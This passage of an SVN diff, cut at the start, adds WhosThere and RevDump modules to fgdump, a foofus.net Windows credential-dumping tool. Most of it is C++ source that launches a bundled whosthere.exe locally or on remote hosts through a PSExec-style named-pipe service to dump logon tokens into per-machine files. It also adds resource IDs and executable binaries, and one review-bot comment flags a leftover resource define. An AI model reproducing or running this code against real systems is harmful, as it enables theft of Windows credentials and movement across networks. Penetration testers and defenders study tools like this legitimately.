nOSBits; void SetTestOnlyAV(bool bTestOnly); + void SetToggleOnlyAV(bool bToggleOnly); void SetSkipCacheDump(bool bSkip); void SetSkipPWDump(bool bSkip); + void SetSkipWhosThere(bool bSkip); + void SetSkipRevDump(bool bSkip); void SetSkipProtectedStorageDump(bool bSkip); void SetIgnoreExistingFiles(bool bIgnoreExisting); void SetHostfileName(char* szFile); Index: HostDumper.h =================================================================== --- HostDumper.h (revision 1246) +++ HostDumper.h (revision 1355) 
@@ -58,6 +58,8 @@ bool bRunLocal; bool RunCacheDump(char* lpszTempPath, bool bIs64Bit, char* lpszPipeName = NULL); + bool RunWhosThere(char* lpszTempPath, char* lpszPipeName = NULL); + bool RunRevDump(char* lpszTempPath, char* lpszPipeName = NULL); bool RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName); bool StopAndRemoveFGExec(bool* bIsFgexecStillInstalled); bool InstallAndStartFGExec(const char* lpszPipeName, bool* bIsFgexecStillInstalled); Index: WhosThereControl.h =================================================================== --- WhosThereControl.h (revision 0) +++ WhosThereControl.h (revision 1355) 
@@ -0,0 +1,37 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2009 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#pragma once +#ifndef _WHOSTHERECONTROL_H +#define _WHOSTHERECONTROL_H + +class WhosThereControl +{ +public: + WhosThereControl(LONG nCacheID = -1); + ~WhosThereControl(void); + + bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL); + +private: + LONG m_nCacheID; + +}; + +#endif \ No newline at end of file Index: resource.h =================================================================== --- resource.h (revision 1246) +++ resource.h (revision 1355) 
@@ -3,24 +3,21 @@ // Used by fgdump.rc // #define IDR_PSTGDUMP 130 -#define IDR_BIN1 152 -#define IDR_BIN2 157 -#define IDR_BIN3 173 -#define IDR_BIN4 180 #define IDR_CACHEDUMP 181 -#define IDR_BIN6 182 #define IDR_CACHEDUMP64 182 #define IDR_PWDUMP 183 -#define IDR_BIN5 184 #define IDR_FGEXEC 184 +#define IDR_WHOSTHERE 194 +#define IDR_REVDUMP 195 +#define IDR_BIN1 199 // Next default values for new objects // #ifdef APSTUDIO_INVOKED #ifndef APSTUDIO_READONLY_SYMBOLS -#define _APS_NEXT_RESOURCE_VALUE 185 +#define _APS_NEXT_RESOURCE_VALUE 200 #define _APS_NEXT_COMMAND_VALUE 40001 #define _APS_NEXT_CONTROL_VALUE 1001 -#define _APS_NEXT_SYMED_VALUE 101 +#define _APS_NEXT_SYMED_VALUE 103 #endif #endif Index: Release/fgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: Debug/fgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: whosthere.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Property changes on: whosthere.exe ___________________________________________________________________ Added: svn:mime-type + application/octet-stream Index: WhosThereControl.cpp =================================================================== --- WhosThereControl.cpp (revision 0) +++ WhosThereControl.cpp (revision 1355) 
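Review bot: `#define IDR_BIN1 199` is re-added after the old IDR_BIN1..IDR_BIN6 aliases were removed, with no matching entry in the fgdump.rc hunk at the top of this diff, so it looks like a resource-editor placeholder that escaped cleanup. Either drop it or add a comment naming the resource it stands for; whether anything else references it is not visible here, so a grep before removal is in order.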
@@ -0,0 +1,136 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2009 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#include "StdAfx.h" +#include "WhosThereControl.h" +#include "Process.h" + +WhosThereControl::WhosThereControl(LONG nCacheID) +{ + m_nCacheID = nCacheID; +} + + +WhosThereControl::~WhosThereControl(void) +{ + +} + +bool WhosThereControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName) +{ + char* lpszCmdLineFormat; + int nArgSize; + char* lpszStopCmdLine; + char* lpszParams; + bool result = false; + + if (lpszPipeName == NULL) + { + // Set the local WhosThere path + lpszCmdLineFormat = "%s\\%s"; + nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName); + lpszStopCmdLine = new char[nArgSize + 1]; + memset(lpszStopCmdLine, 0, nArgSize + 1); + _snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName); + + // Now set the parameters + lpszCmdLineFormat = " -l"; + nArgSize = strlen(lpszCmdLineFormat); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, 
nArgSize, lpszCmdLineFormat); + } + else + { + lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1]; + memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1); + strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath)); + + lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l"; + + nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + } + + try + { + Process p; + + HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams); + if (hProcess != 0) + { + DWORD dwResult = WaitForSingleObject(hProcess, 1200000); // Wait 20 minutes for process to complete + if (dwResult != WAIT_OBJECT_0) + { + Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: WhosThere did not complete in a timely manner - exiting"); + result = false; + } + else + { + // Read from process's output + char* szResult; + int nSize = 65535; + + szResult = new char[nSize]; + memset(szResult, 0, nSize); + p.ReadFromPipe(&szResult, nSize); + + // Was it successful? 
+ if (strstr(szResult, "the output format is") != NULL) + { + // Success + // Write results to a file + size_t nLen = strlen(lpszMachine) + 10; // 10 chars accounts for ".whosthere" extension + char* szTempFilename = new char[nLen + 1]; + memset(szTempFilename, 0, nLen + 1); + _snprintf(szTempFilename, nLen, "%s.whosthere", lpszMachine); + + std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc); + outputFile.write((const char*)szResult, (DWORD)strlen(szResult)); + outputFile.close(); + delete [] szTempFilename; + Log.CachedReportError(m_nCacheID, CRITICAL, "Logon tokens dumped successfully\n", lpszMachine); + result = true; + } + else + { + // Failed + Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump logon tokens (the text returned follows):\n%s", szResult); + result = false; + } + + delete [] szResult; + } + } + else + result = false; + } + catch(...) + { + result = false; + } + + delete [] lpszStopCmdLine; + delete [] lpszParams; + + return result; +} + Index: revdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Property changes on: revdump.exe ___________________________________________________________________ Added: svn:mime-type + application/octet-stream